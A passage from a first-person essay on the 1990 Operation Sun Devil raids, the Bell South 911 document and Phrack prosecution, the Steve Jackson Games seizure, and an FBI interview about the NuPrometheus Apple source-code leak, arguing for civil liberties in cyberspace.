theft?  Is the track-less passage of a mind through TRW's mainframe 
the same as the passage of a pickup through my Back 40?  What is a 
place if Cyberspace is everywhere?  What are data and what is free 
speech?  How does one treat property which has no physical form 
and can be infinitely reproduced?  Is a computer the same as a 
printing press?  Can the history of my business affairs properly 
belong to someone else?  Can anyone morally claim to own 
knowledge itself?

If such questions were hard to answer precisely, there are those who 
are ready to try.  Based on their experience in the Virtual World, they 
were about as qualified to enforce its mores as I am to write the Law 
of the Sea.  But if they lacked technical sophistication, they brought to 
this task their usual conviction.  And, of course, badges and guns.

******


Operation Sun Devil

"Recently, we have witnessed an alarming number of young people who, for  
a variety of  sociological and psychological reasons, have become attached to 
their  computers and are  exploiting their potential in a criminal manner.  
Often, a progression of  criminal activity  occurs which involves 
telecommunications fraud (free long distance phone  calls),  unauthorized 
access to other computers (whether for profit, fascination, ego,  or the  
intellectual challenge), credit card fraud (cash advances and unauthorized  
purchases of  goods), and then move on to other destructive activities like 
computer  viruses."  

"Our experience shows that many computer hacker suspects are no longer  
misguided  teenagers mischievously playing games with their computers in 
their  bedrooms.  Some are  now high tech computer operators using 
computers to engage in unlawful conduct." 
--	Excerpts from a statement by
	Garry M. Jenkins
	Asst. Director, U. S. Secret Service
						
"The right of the people to be secure in their persons, houses, papers, and  
effects, against  unreasonable searches and seizures, shall not be violated, and 
no warrants  shall issue but  upon probable cause, support by oath or 
affirmation, and particularly  describing the place  to be searched, and the 
persons or things to be seized." 
--	Amendment IV
	United States Constitution
	
On January 24, 1990, a platoon of Secret Service agents entered the 
apartment which Acid Phreak shares with his mother and 12 year-old 
sister.  The latter was the only person home when they burst through 
the door with guns drawn.  They managed to hold her at bay for 
about half an hour until their quarry happened home.  

By then, they were nearly done packing up Acid's worldly goods, 
including his computer, his notes (both paper and magnetic), books, 
and such dubiously dangerous tools as a telephone answering 
machine, a ghetto blaster and his complete collection of audio tapes.  
One agent asked him to define the real purpose of the answering 
machine and was frankly skeptical when told that it answered the 
phone.  The audio tapes seemed to contain nothing but music, but 
who knew what dark data Acid might have encoded between the 
notes... 

When Acid's mother returned from work, she found her apartment a 
scene of apprehended criminality.  She asked what, exactly, her son 
had done to deserve all this attention and was told that, among other 
things, he had caused the AT&T system crash several days earlier.  
(Previously AT&T had taken full responsibility.) Thus, the agent 
explained, her darling boy was thought to have caused over a billion 
dollars in damage to the economy of the United States.  

This accusation was never turned into a formal charge.  Indeed, no 
charge of any sort of was filed against Mr. Phreak then and, although 
the Secret Service maintained resolute possession of his hardware, 
software, and data, no c harge had been charged 4 months later.

Across town, similar scenes were being played out at the homes of 
Phiber Optik and another colleague code-named Scorpion.  Again, 
equipment, notes, disks both hard and soft, and personal effects were 
confiscated.  Again no charges were filed.

Thus began the visible phase of Operation Sun Devil, a two-year 
Secret Service investigation which involved 150 federal agents, 
numerous local and state law enforcement agencies. and the 
combined security resources of PacBell, AT&T, Bellcore, Bell South 
MCI, U.S. Sprint, Mid-American, Southwestern Bell, NYNEX, U.S. 
West and American Express.

The focus of this impressive institutional array was the Legion of 
Doom, a group which never had any formal membership list but was 
thought by the members with whom I spoke to number less than 20, 
nearly all of them in their teens or early twenties.

I asked Acid why they'd chosen such a threatening name.  "You 
wouldn't want a fairy kind of thing like Legion of Flower Pickers or 
something.  But the media ate it up too.  Probing the Legion of Doom 
like it was a gang or something, when really it was just a bunch of 
geeks behind terminals."

******


Sometime in December 1988, a 21 year-old Atlanta-area Legion of 
Doomster named The Prophet cracked a Bell South computer and 
downloaded a three-page text file which outlined, in bureaucrat-ese 
of surpassing opacity, the administrative procedures and 
responsibilities for marketing, servicing, upgrading, and billing for 
Bell South's 911 system.  

A dense thicket of acronyms, the document was filled with passages 
like:  

"In accordance with the basic SSC/MAC strategy for provisioning, the  
SSC/MAC will be  Overall Control Office (OCO) for all Notes to PSAP circuits 
(official services)  and any  other services for this customer.  Training must be 
scheduled for all  SSC/MAC involved  personnel during the pre-service stage 
of the project."   

And other such.

At some risk, I too have a copy of this document.  To read the whole 
thing straight through without entering coma requires either a 
machine or a human who has too much practice thinking like one.  
Anyone who can understand it fully and fluidly has altered his 
consciousness beyond the ability to ever again read Blake, Whitman, 
or Tolstoy.  It is, quite simply, the worst writing I have ever tried to 
read.  

Since the document contains little of interest to anyone who is not a 
student of advanced organizational sclerosis...that is, no access codes, 
trade secrets, or proprietary information...I assume The Prophet only 
copied this file as a kind of hunting trophy.  He had been to the heart 
of the forest and had returned with this coonskin to nail to the barn 
door.

Furthermore, he was proud of his accomplishment, and since such 
trophies are infinitely replicable, he wasn't content to nail it to his 
door alone.  Among the places he copied it was a UNIX bulletin 
board (rather like the WELL) in Lockport, Illinois called Jolnet.  

It was downloaded from there by a 20 year-old hacker and pre-law 
student (whom I had met in the Harper's Forum) who called himself 
Knight Lightning.  Though not a member of the Legion of Doom, 
Knight Lightning and a friend, Taran King, also published from St. 
Louis and his fraternity house at the University of Missouri a 
worldwide hacker's magazine called Phrack.  (From phone phreak and 
hack.)

Phrack was an unusual publication in that it was entirely virtual.  The 
only time its articles hit paper was when one of its subscribers 
decided to print out a hard copy.  Otherwise, its editions existed in 
Cyberspace and took no physical form.  

When Knight Lightning got hold of the Bell South document, he 
thought it would amuse his readers and reproduced it in the next 
issue of Phrack.  He had little reason to think that he was doing 
something illegal.  There is nothing in it to indicate that it contains 
proprietary or even sensitive information.  Indeed, it closely 
resembles telco reference documents which have long been publicly 
available.

However, Rich Andrews, the systems operator who oversaw the 
operation of Jolnet, thought there might be something funny about 
the document when he first ran across it in his system.  To be on the 
safe side, he forwarded a copy of it to AT&T officials.  He was 
subsequently contacted by the authorities, and he cooperated with 
them fully.  He would regret that later. 

On the basis of the forgoing, a Grand Jury in Lockport was persuaded 
by the Secret Service in early February to hand down a seven count 
indictment against The Prophet and Knight Lightning, charging 
them, among other things, with interstate transfer of stolen property 
worth more than $5,000.  When The Prophet and two of his Georgia 
colleagues were arrested on February 7, 1990, the Atlanta papers 
reported they faced 40 years in prison and a $2 million fine.  Knight 
Lightning was arrested on February 15.   

The property in question was the affore-mentioned blot on the 
history of prose whose full title was A Bell South Standard Practice 
(BSP) 660-225-104SV-Control Office Administration of Enhanced 911 
Services for Special Services and Major Account Centers, March, 1988.

And not only was this item worth more than $5,000.00, it was worth, 
according to the indictment and Bell South, precisely $79,449.00.  And 
not a penny less.  We will probably never know how this figure was 
reached or by whom, though I like to imagine an appraisal team 
consisting of Franz Kafka, Joseph Heller, and Thomas Pynchon...

In addition to charging Knight Lightning with crimes for which he 
could go to jail 30 years and be fined $122,000.00, they seized his 
publication, Phrack, along with all related equipment, software and 
data, including his list of subscribers, many of whom would soon lose 
their computers and data for the crime of appearing on it.   

I talked to Emmanuel Goldstein, the editor of 2600, another hacker 
publication which has been known to publish purloined documents.  
If they could shut down Phrack, couldn't they as easily shut down 
2600?  

He said, "I've got one advantage.  I come out on paper and the 
Constitution knows   how to deal with paper."  

In fact, nearly all publications are now electronic at some point in 
their creation.  In a modern newspaper, stories written at the scene 
are typed to screens and then sent by modem to a central computer.  
This computer composes the layout in electronic type and the entire 
product transmitted electronically to the presses.  There, finally, the 
bytes become ink.  

Phrack merely omitted the last step in a long line of virtual events.  
However, that omission, and its insignificant circulation, left it 
vulnerable to seizure based on content.  If the 911 document had been 
the Pentagon Papers (another proprietary document) and Phrack the 
New York Times, a completion of the analogy would have seen the 
government stopping publication of the Times and seizing its every 
material possession, from notepads to presses.  

Not that anyone in the newspaper business seemed particularly 
worried about such implications.  They, and the rest of the media 
who bothered to report Knight Lightning's arrest were too obsessed 
by what they portrayed as actual disruptions of emergency service 
and with marvelling at the sociopathy of it.  One report expressed 
relief that no one appeared to have died as a result of the 
"intrusions."

Meanwhile, in Baltimore, the 911 dragnet snared Leonard Rose, aka 
Terminus.  A professional computer consultant who specialized in 
UNIX, Rose got a visit from the government early in February.  The 
G-men forcibly detained his wife and children for six hours while 
they interrogated Rose about the 911 document and ransacked his 
system.  

Rose had no knowledge of the 911 matter.  Indeed, his only 
connection had been occasional contact with Knight Lightning over 
several years...and admitted membership in the Legion of Doom.  
However, when searching his hard disk for 911 evidence, they found 
something else.  Like many UNIX consultants, Rose did have some 
UNIX source code in his possession.   Furthermore, there was 
evidence that he had transmitted some of it to Jolnet and left it there 
for another consultant.  

UNIX is a ubiquitous operating system, and though its main virtue is 
its openness to amendment at the source level, it is nevertheless the 
property of AT&T.  What had been widely d  istributed within 
businesses and universities for years was suddenly, in Rose's hands, 
a felonious possession.       

Finally, the Secret Service rewarded the good citizenship of Rich 
Andrews by confiscating the computer where Jolnet had dwelt, along 
with all the e-mail, read and un-read, which his subscribers had left 
there.  Like the many others whose equipment and data were taken 
by the Secret Service subsequently, he wasn't charged with anything.  
Nor is he likely to be.  They have already inflicted on him the worst 
punishment a nerd can suffer: data death.

Andrews was baffled.  "I'm the one that found it, I'm the one that 
turned it in...And I'm the one that's suffering," he said.  

One wonders what will happen when they find such documents on 
the hard disks of CompuServe.  Maybe I'll just upload my copy of  
Bell South Standard Practice (BSP) 660-225-104SV and see...

In any case, association with stolen data is all the guilt you need.  It's 
quite as if the government could seize your house simply because a 
guest left a stolen VCR in an upstairs bedroom closet.  Or confiscate 
all the mail in a post office upon finding a stolen package there. The 
first concept of modern jurisprudence to have arrived in Cyberspace 
seems to have been Zero Tolerance. 

******


Rich Andrews was not the last to learn about the Secret Service's 
debonair new attitude toward the 4th Amendment's protection 
against unreasonable seizure.   

Early on March 1, 1990, the offices of a role-playing game publisher in 
Austin, Texas called Steve Jackson Games were visited by agents of 
the United States Secret Service.  They ransacked the premises, broke 
into several locked filing cabinets (damaging them irreparably in the 
process) and eventually left carrying 3 computers, 2 laser printers, 
several hard disks, and many boxes of paper and floppy disks.

Later in the day, callers to the Illuminati BBS (which Steve Jackson 
Games operated to keep in touch with roll-players around the 
country) encountered the following message:  

"So far we have not received a clear explanation of what the Secret Service  
was looking  for, what they expected to find, or much of anything else. We are 
fairly certain  that Steve  Jackson Games is not the target of whatever 
investigation is being conducted;  in any case,  we have done nothing illegal 
and have nothing whatsoever to hide.  However, the  equipment that was 
seized is apparently considered to be evidence in  whatever they're  
investigating, so we aren't likely to get it back any time soon. It could be a  
month, it could  be never." 

It's been three months as I write this, and not only has nothing been 
returned to them, but, according to Steve Jackson, the Secret Service 
will no longer take his calls.  He figures that, in the months since the 
raid, his little company has lost an estimated $125,000.  With such a 
fiscal hemorrhage, he can't afford a lawyer to take after the Secret 
Service.  Both the state and national offices of the ACLU told him to 
"run along" when he solicited their help. 

He tried to go to the press.  As in most other cases, they were 
unwilling to raise the alarm.  Jackson theorized, "The conservative 
press is taking the attitude that the suppression of evil hackers is a 
good thing and that anyone who happens to be put out of business in 
the meantime...well, that's just their tough luck."

In fact, Newsweek did run a story about the event, portraying it from 
Jackson's perspective, but they were almost alone in dealing with it.

What had he done to deserve this nightmare?  Role-playing games, of 
which Dungeons and Dragons is the most famous, have been accused 
of creating obsessive involvement in their nerdy young players, but 
no one before had found it necessary to prevent their publication. 
 
It seems that Steve Jackson had hired the wrong writer.  The 
managing editor of Steve Jackson Games is a former cracker,  known 
by his fellows in the Legion of Doom as The Mentor.  At the time of 
the raid, he and the rest of Jackson staff had been working for over a 
year on a game called GURPS Cyberpunk, High-Tech Low-Life Role-
Playing. 

At the time of the Secret Service raids, the game resided entirely on 
the hard disks they confiscated.  Indeed, it was their target.  They told 
Jackson that, based on its author's background, they had reason to 
believe it was a "handbook on computer crime."  It was therefore 
inappropriate for publication, 1st Amendment or no 1st Amendment. 

I got a copy of the game from the trunk of The Mentor's car in an 
Austin parking lot.  Like the Bell South document, it seemed pretty 
innocuous to me, if a little inscrutable.   Borrowing its flavor from the 
works of William Gibson and Austin sci-fi author Bruce Sterling, it is 
filled with silicon brain implants, holodecks, and gauss guns.  

It is, as the cover copy puts it, "a fusion of the dystopian visions of 
George Orwell and Timothy Leary." Actually, without the gizmos, it 
describes a future kind of like the present its publisher is 
experiencing at the hands of the Secret Service.    

An unbelievably Byzantine world resides within its 120 large pages 
of small print.  (These roll-players must be some kind of idiots 
savants...)  Indeed, it's a thing of such complexity that I can't swear 
there's no criminal information in there, but then I can't swear that 
Grateful Dead records don't have satanic messages if played 
backwards.  Anything's possible, especially inside something as 
remarkable as Cyberpunk.  

The most remarkable thing about Cyberpunk is the fact that it was 
printed at all.  After much negotiation, Jackson was able to get the 
Secret Service to let him have some of his data back.  However, they 
told him that he would be limited to an hour and a half with only one 
of his three computers.  Also, according to Jackson, "They insisted 
that all the copies be made by a Secret Service agent who was a two-
finger typist.  So we didn't get much. "

In the end, Jackson and his staff had to reconstruct most of the game 
from neural rather than magnetic memory.  They did have a few very 
old backups, and they retrieved some scraps which had been passed 
around to game testers.  They also had the determination of the 
enraged.   

Despite government efforts to impose censorship by prior restraint, 
Cyberpunk is now on the market.  Presumably, advertising it as "The 
book that was seized by the U.S. Secret Service" will invigorate sales.  
But Steve Jackson Games, the heretofore prosperous publisher of 
more than a hundred role-playing games, has been forced to lay off 
more than half of its employees and may well be mortally wounded.  

Any employer who has heard this tale will think hard before he hires 
a computer cracker.  Which may be, of course, among the effects the 
Secret Service desires.

******


On May 8, 1990, Operation Sun Devil, heretofore an apparently 
random and nameless trickle of Secret Service actions, swept down 
on the Legion of Doom and its ilk like a bureaucratic tsunami.  On 
that day, the Secret Service served 27 search warrants in 14 cities from 
Plano, Texas to New York, New York.

The law had come to Cyberspace.  When the day was over, transit 
through the wide open spaces of the Virtual World would be a lot 
trickier. 

In a press release following the sweep, the Secret Service boasted 
having shut down numerous computer bulletin boards, confiscated 
40 computers, and seized 23,000 disks.  They noted in their statement 
that "the conceivable criminal violations of this operation have 
serious implications for the health and welfare of all individuals, 
corporations, and United States Government agencies relying on 
computers and telephones to communicate."

It was unclear from their statement whether "this operation" meant 
the Legion of Doom or Operation Sun Devil.  There was room to 
interpret it either way.

Because the deliciously ironic truth is that, aside from the 3 page Bell 
South document, the hackers had neither removed nor damaged 
anyone's data. Operation Sun Devil, on the other hand, had "serious 
implications" for a number of folks who relied on "computers and 
telephones to communicate." They lost the equivalent of about 5.4 
million pages of information.  Not to mention a few computers and 
telephones.

And the welfare of the individuals behind those figures was surely in 
jeopardy.  Like the story of the single mother and computer 
consultant in Baltimore whose sole means of supporting herself and 
her 18 year old son was stripped away early one morning.  Secret 
Service agents broke down her door with sledge hammers, entered 
with guns drawn, and seized all her computer equipment.  
Apparently her son had also been using it...

Or the father in New York who opened the door at 6:00 AM and 
found a shotgun at his nose.  A dozen agents entered.  While one of 
the kept the man's wife in a choke-hold, the rest made ready to shoot 
and entered the bedroom of their sleeping 14 year-old.  Before 
leaving, they confiscated every piece of electronic equipment in the 
house, including all the telephones.

It was enough to suggest that the insurance companies should start 
writing policies against capricious governmental seizure of circuitry. 

In fairness, one can imagine the government's problem.  This is all 
pretty magical stuff  to them.  If I were trying to terminate the 
operations of a witch coven, I'd probably seize everything in sight.  
How would I tell the ordinary household brooms from the getaway 
vehicles?

But as I heard more and more about the vile injustices being heaped 
on my young pals in the Legion of Doom, not to mention the 
unfortunate folks nearby, the less I was inclined toward such 
temperate thoughts as these.  I drifted back into a 60's-style sense of 
the government, thinking it a thing of monolithic and evil efficiency 
and adopting an up-against-the-wall willingness to spit words like 
"pig" or "fascist" into my descriptions. 

In doing so, I endowed the Secret Service with a clarity of intent 
which no agency of government will ever possess.  Despite almost 
every experience I've ever had with federal authority, I keep 
imagining its competence.  

For some reason, it was easier to invest the Keystone Kapers of 
Operation Sun Devil with malign purpose rather than confront their 
absurdity straight-on.  There is, after all, a twisted kind of comfort in 
political paranoia.  It provides one such a sense of orderliness to think 
that the government is neither crazy nor stupid and that its plots, 
though wicked, are succinct.

I was about to have an experience which would restore both my 
natural sense of unreality and my unwillingness to demean the 
motives of others.  I was about to see first hand the disorientation of 
the law in the featureless vastness of Cyberspace.
    
 


In Search of NuPrometheus


"I pity the poor immigrant..."

--	Bob Dylan


Sometime last June, an angry hacker got hold of a chunk of the highly 
secret source code which drives the Apple Macintosh.  He then 
distributed it to a variety of addresses, claiming responsibility for this 
act of information terrorism in the name of the Nu  Prometheus 
League.

Apple freaked.  NuPrometheus had stolen, if not the Apple crown 
jewels, at least a stone from them.  Worse, NuPrometheus had then 
given this prize away.  Repeatedly.

All Apple really has to offer the world is the software which lies 
encoded in silicon on the ROM chip of every Macintosh.  This set of 
instructions is the cyber-DNA which makes a Macintosh a Macintosh.  

Worse, much of the magic in this code was put there by people who 
not only do not work for Apple any longer, but might only do so 
again if encouraged with cattle prods.  Apple's attitude toward its 
ROM code is a little like that of a rich kid toward his inheritance.  Not 
actually knowing how to create wealth himself, he guards what he 
has with hysterical fervor.

Time passed, and I forgot about the incident.  But one recent May 
morning, I leaned that others had not.  The tireless search for the 
spectral heart of NuPrometheus finally reached Pinedale, Wyoming, 
where I was the object of a two hour interview by Special Agent 
Richard Baxter, Jr.  of the Federal Bureau of Investigation.  

Poor Agent Baxter didn't know a ROM chip from a Vise-grip when 
he arrived, so much of that time was spent trying to educate him on 
the nature of the thing which had been stolen.  Or whether "stolen" 
was the right term for what had happened to it.     

You know things have rather jumped the groove when potential 
suspects must explain to law enforcers the nature of their alleged 
perpetrations.  

I wouldn't swear Agent Baxter ever got it quite right.  After I showed 
him some actual source code, gave a demonstration of e-mail in 
action, and downloaded a file  from the WELL, he took to rubbing his 
face with both hands, peering up over his finger tips and saying, "It 
sure is something, isn't it"  Or, "Whooo-ee." 

Or "my eight year-old knows more about these things than I do."  He 
didn't say this with a father's pride so much as an immigrant's fear of 
a strange new land into which he will be forcibly moved and in 
which his own child is a native.  He looked across my keyboard into 
Cyberspace and didn't like what he saw.

We could have made it harder for one another, but I think we each 
sensed that the other occupied a world which was as bizarre and 
nonsensical as it could be. We did our mutual best to suppress 
immune response at the border.

You'd have thought his world might have been a little more 
recognizable to me.  Not so, it turns out.  Because in his world, I 
found several unfamiliar features, including these: 

1.	The Hacker's Conference is an underground organization of 
computer outlaws with likely connections to, and almost certainly 
sympathy with, the NuPrometheus League.  (Or as Agent Baxter 
repeatedly put it, the "New Prosthesis League.")  

 2.	John Draper, the affore-mentioned Cap'n Crunch, in addition to 
being a known member of the Hacker's Conference, is also CEO 
and president of Autodesk, Inc.  This is of particular concern to 
the  FBI because Autodesk has many top-secret contracts with the 
government to supply Star Wars graphics imaging and 
"hyperspace" technology.  Worse, Draper is thought to have 
Soviet contacts.

He wasn't making this up.  He had lengthy documents from the San 
Francisco office to prove it.  And in which Autodesk's address was 
certainly correct.  

On the other hand, I know John Draper. While, as I say, he may have 
once distinguished himself as a cracker during the Pleistocene, he is 
not now, never has been, and never will be CEO of Autodesk.  He did 
work there for awhile last year, but he was let go long before he got 
in a position to take over.

Nor is Autodesk, in my experience with it, the Star Wars skunk 
works which Agent Baxter's documents indicated.  One could hang 
out there a long time without ever seeing any gold braid.  

Their primary product is something called AutoCAD, by far the most 
popular computer-aided design software but generally lacking in 
lethal potential.  They do have a small development program in 
Cyberspace, which is what they call Virtual Reality.  (This, I assume is 
the "hyperspace" to which Agent Baxter's documents referred.)

However, Autodesk had reduced its Cyberspace program to a couple 
of programmers. I imagined Randy Walser and Carl Tollander toiling 
away in the dark and lonely service of their country.  Didn't work.  
Then I tried to describe Virtual Reality to Agent Baxter, but that 
didn't work either.  In fact, he tilted.  I took several runs at it, but I 
could tell I was violating our border agreements. These seemed to 
include a requirement that neither of us try to drag the other across 
into his conceptual zone.

I fared a little better on the Hacker's Conference.  Hardly a 
conspiracy, the Hacker's Conference is an annual convention 
originated in 1984 by the Point Foundation and the editors of Whole 
Earth Review.  Each year it invites about a hundred of the most gifted 
and accomplished of digital creators. Indeed, they are the very people 
who have conducted the personal computer revolution.  Agent Baxter 
looked at my list of Hacker's Conference attendees and read their 
bios.  
  
"These are the people who actually design this stuff, aren't they?"  He 
was incredulous.  Their corporate addresses didn't fit his model of 
outlaws at all well.

Why had he come all the way to Pinedale to investigate a crime he 
didn't understand which had taken place (sort of) in 5 different 
places, none of which was within 500 miles?

Well, it seems Apple has told the FBI that they can expect little 
cooperation from Hackers in and around the Silicon Valley, owing to 
virulent anti-Apple sentiment there.  They claim this is due to the 
Hacker belief that software should be free combined with festering 
resentment of Apple's commercial success.  They advised the FBI to 
question only those Hackers who were as far as possible from the 
twisted heart of the subculture.

They did have their eye on some local people though.  These 
included a couple of former Apple employees, Grady Ward and 
Water Horat, Chuck Farnham (who has made a living out of 
harassing Apple), Glenn Tenney (the purported leader of the 
Hackers), and, of course, the purported CEO of Autodesk.

Other folks Agent Baxter asked me about included Mitch Kapor, who 
wrote Lotus 1-2-3 and was  known to have received some this 
mysterious source code.  Or whatever.  But I had also met Mitch 
Kapor, both on the WELL and in person.  A less likely computer 
terrorist would be hard to come by. 

Actually, the question of the source code was another area where 
worlds but shadow-boxed.  Although Agent Baxter didn't know 
source code from Tuesday, he did know that Apple Computer had 
told his agency that what had been stolen and disseminated was the 
complete recipe for a Macintosh computer.  The distribution of this 
secret formula might result in the creation of millions of Macintoshes 
not made by Apple.  And, of course, the ruination of Apple 
Computer.  

In my world, NuPrometheus (whoever they, or more likely, he might 
be) had distributed a small portion of the code which related 
specifically to Color QuickDraw.  QuickDraw is Apple's name for the 
software which controls the Mac's on-screen graphics.  But this was 
another detail which  Agent Baxter could not capture.  For all he 
knew, you could grow Macintoshes from floppy disks.  

I explained to him that Apple was alleging something like the ability 
to assemble an entire human being from the recipe for a foot, but 
even he know the analogy was inexact.  And trying to get him to 
accept the idea that a corporation could go mad with suspicion was 
quite futile.  He had a far different perception of the emotional 
reliability of institutions.

When he finally left, we were both dazzled and disturbed.  I spent 
some time thinking about Lewis Carroll and tried to return to writing 
about the legal persecution of the Legion of Doom.  But my heart 
wasn't in it.  I found myself suddenly too much in sympathy with 
Agent Baxter and his struggling colleagues from Operation Sun Devil 
to get back into a proper sort of pig-bashing mode.  

Given what had happened to other innocent bystanders like Steve 
Jackson, I gave some thought to getting scared.  But this was Kafka in 
a clown suit.  It wasn't precisely frightening.  I also took some 
comfort in a phrase once applied to the administration of Frederick 
the Great: "Despotism tempered by incompetence."  

Of course, incompetence is a double-edged banana.  While we may 
know this new territory better than the authorities, they have us 
literally out-gunned.  One should pause before making well-armed 
paranoids feel foolish, no matter how foolish they seem.  

  
******   

The Fear of White Noise

"Neurosis is the inability to tolerate ambiguity."

--	Sigmund Freud,
	appearing to me in a dream


I'm a member of that half of the human race which is inclined to 
divide the human race into two kinds of people.  My dividing line 
runs between the people who crave certainty and the people who 
trust chance. 

You can draw this one a number of ways, of course, like Control vs. 
Serendipity, Order vs. Chaos, Hard answers vs. Silly questions, or 
Newton, Descartes & Aquinas vs. Heisenberg, Mandelbrot & the 
Dalai Lama.  Etc. 

Large organizations and their drones huddle on one end of my scale, 
busily trying to impose predictable homogeneity on messy 
circumstance.  On the other end, free-lancers and ne'er-do-wells 
cavort about, getting by on luck  if they get by at all.  

However you cast these poles, it comes down to the difference 
between those who see life as a struggle against cosmic peril and 
human infamy and those who believe, without any hard evidence, 
that the universe is actually on our side.  Fear vs. Faith.

I am of the latter group.  Along with Gandhi and Rebecca of 
Sunnybrook Farm, I believe that other human beings will quite 
consistently merit my trust if I'm not doing something which scares 
them or makes them feel bad about themselves.  In other words, the 
best defense is a good way to get hurt.  

In spite of the fact that this system works very reliably for me and my 
kind, I find we are increasingly in the minority.  More and more of 
our neighbors live in armed compounds.  Alarms blare continuously.  
Potentially happy people give their lives over to the corporate state as 
though the world were so dangerous outside its veil of collective 
immunity that they have no choice.  

I have a number of theories as to why this is happening.  One has to 
do with the opening of Cyberspace.  As a result of this development, 
humanity is now undergoing the most profound transformation of its 
history.  Coming into the Virtual World, we inhabit Information.  
Indeed, we become Information.  Thought is embodied and the Flesh 
is made Word.  It's weird as hell. 

Beginning with the invention of the telegraph and extending through 
television into Virtual Reality, we have been, for a over a century, 
experiencing a terrifying erosion in our sense of both body and place.  
As we begin to realize the enormity of what is happening to us, all 
but the most courageous have gotten scared.  

And everyone, regardless of his psychic resilience, feels this 
overwhelming sense of strangeness.  The world, once so certain and 
tangible and legally precise, has become an infinite layering of 
opinions, perceptions, litigation, camera-angles, data, white noise, 
and, most of all, ambiguities.  Those of us who are of the fearful 
persuasion do not like ambiguities.  

Indeed, if one were a little jumpy to start with, he may now be fairly 
humming with nameless dread.  Since no one likes his dread to be 
nameless, the first order of business is to find it some names.

For a long time here in the United States, Communism provided a 
kind of catch-all bogeyman.  Marx, Stalin and Mao summoned forth 
such a spectre that, to many Americans, annihilation of all life was 
preferable to the human portion's becoming Communist.  But as Big 
Red wizened and lost his teeth, we began to cast about for a 
replacement.  

Finding none of sufficient individual horror, we have draped a 
number of objects with the old black bunting which once shrouded 
the Kremlin.  Our current spooks are terrorists, child abductors, 
AIDS, and the underclass.  I would say drugs, but anyone who thinks 
that the War on Drugs is not actually the War on the Underclass 
hasn't been paying close enough attention. 

There are a couple of problems with these Four Horsemen.  For one 
thing, they aren't actually very dangerous.  For example, only 7 
Americans died in worldwide terrorist attacks in 1987.  Fewer than 10 
(out of about 70 million) children are abducted by strangers in the 
U.S. each year.  Your chances of getting AIDS if you are neither gay 
nor a hemophiliac nor a junkie are considerably less than your 
chances of getting killed by lightning while golfing.  The underclass is 
dangerous, of course, but only, with very few exceptions, if you are a 
member of it.

The other problem with these perils is that they are all physical.  If we 
are entering into a world in which no one has a body, physical threats 
begin to lose their sting.  

And now I come to the point of this screed:  The perfect bogeyman 
for Modern Times is the Cyberpunk!  He is so smart he makes you 
feel even more stupid than you usually do.  He knows this complex 
country in which you're perpetually lost.  He understands the value 
of things you can't conceptualize long enough to cash in on.  He is the 
one-eyed man in the Country of the Blind.

In a world where you and your wealth consist of nothing but beeps 
and boops of micro-voltage, he can steal all your assets in 
nanoseconds and then make you disappear.  

He can even reach back out of his haunted mists and kill you 
physically.  Among the justifications for Operation Sun Devil was 
this chilling tidbit:

"Hackers had the ability to access and review the files of hospital patients.   
Furthermore,  they could have  added, deleted, or altered vital patient 
information, possibly  causing life- threatening situations." 

Perhaps the most frightening thing about the Cyberpunk is the 
danger he presents to The Institution, whether corporate or 
governmental.  If you are frightened you have almost certainly taken 
shelter by now in one of these collective organisms, so the very last 
thing you want is something which can endanger your heretofore 
unassailable hive.  

And make no mistake, crackers will become to bureaucratic bodies 
what viruses presently are to human bodies.  Thus, Operation Sun 
Devil can be seen as the first of many waves of organizational 
immune response to this new antigen.  Agent Baxter was a T-cell.  
Fortunately, he didn't know that himself and I was very careful not to 
show him my own antigenic tendencies.

I think that herein lies the way out of what might otherwise become 
an Armageddon between the control freaks and the neo-hip.  Those 
who are comfortable with these disorienting changes must do 
everything in our power to convey that comfort to others.  In other 
words, we must share our sense of hope and opportunity with those 
who feel that in Cyberspace they will be obsolete eunuchs for sure.                        

It's a tall order.  But, my silicon brothers, our self-interest is strong.  If 
we come on as witches, they will burn us.  If we volunteer to guide 
them gently into its new lands, the Virtual World might be a more 
amiable place for all of us than this one has been.

Of course, we may also have to fight.

******     

Defining the conceptual and legal map of Cyberspace before the 
ambiguophobes do it for us (with punitive over-precision) is going to 
require some effort.  We can't expect the Constitution to take care of 
itself.  Indeed, the precedent for mitigating the Constitutional 
protection of a new medium has already been established.  Consider 
what happened to radio in the early part of this century.

Under the pretext of allocating limited bandwidth, the government 
established an early right of censorship over broadcast content which 
still seems directly unconstitutional to me.  Except that it stuck.  And 
now, owing to a large body of case law, looks to go on sticking.

New media, like any chaotic system, are highly sensitive to initial 
conditions.  Today's heuristical answers of the moment become 
tomorrow's permanent institutions of both law and expectation.  
Thus, they bear examination with that destiny in mind.

Earlier in this article, I asked a number of tough questions relating to 
the nature of property, privacy, and speech in the digital domain.  
Questions like:  "What are data and what is free speech?" or  "How 
does one treat property which has no physical form and can be 
infinitely reproduced?"  or  "Is a computer the same as a printing 
press."  The events of Operation Sun Devil were nothing less than an 
effort to provide answers to these questions.  Answers which  would 
greatly enhance governmental ability to silence the future's 
opinionated nerds.  

In over-reaching as extravagantly as they did, the Secret Service may 
actually have done a service for those of us who love liberty.  They 
have provided us with a devil.  And devils, among their other 
galvanizing virtues, are just great for clarifying the issues and putting 
iron in your spine.  In the presence of a devil, it's always easier to 
figure out where you stand.  

While I previously had felt no stake in the obscure conundra of free 
telecommunication, I was, thanks to Operation Sun Devil, suddenly 
able to plot a trajectory from the current plight of the Legion of Doom 
to an eventual constraint on opinions much dearer to me.  I 
remembered Martin Neimoeller, who said:

"In Germany they came first for the Communists, and I didn't speak up  
because I wasn't a  Communist.  Then they came for the Jews, and I didn't 
speak up because I  wasn't a Jew.   They came for the trade unionists, and I 
didn't speak up because I wasn't a  trade unionist.   Then they came for the 
Catholics, and I didn't speak up because I was a  Protestant.  Then  they came 
for me, and by that time no one was left to speak up." 

I decided it was time for me to speak up.  

The evening of my visit from Agent Baxter, I wrote an account of it 
which I placed on the WELL.   Several days later, Mitch Kapor 
literally dropped by for a chat.  

Also a WELL denizen, he had read about Agent Baxter and had 
begun to meditate on the inappropriateness of leaving our civil 
liberties to be defined by the technologically benighted.  A man who 
places great emphasis on face-to-face contact, he wanted to discuss 
this issue with me in person.  He had been flying his Canadair bizjet 
to a meeting in California when he realized his route took him 
directly over Pinedale. 

We talked for a couple of hours in my office while a spring 
snowstorm swirled outside.  When I recounted for him what I had 
learned about Operation Sun Devil, he decided it was time for him to 
speak up too.

He called a few days later with the phone number of a civil 
libertarian named Harvey Silverglate, who, as evidence of his 
conviction that everyone deserves due process, is   currently 
defending Leona Helmsley.  Mitch asked me to tell Harvey what I 
knew, with the inference that he would help support the costs which 
are liable to arise whenever you tell a lawyer anything.

I found Harvey in New York at the offices of that city's most 
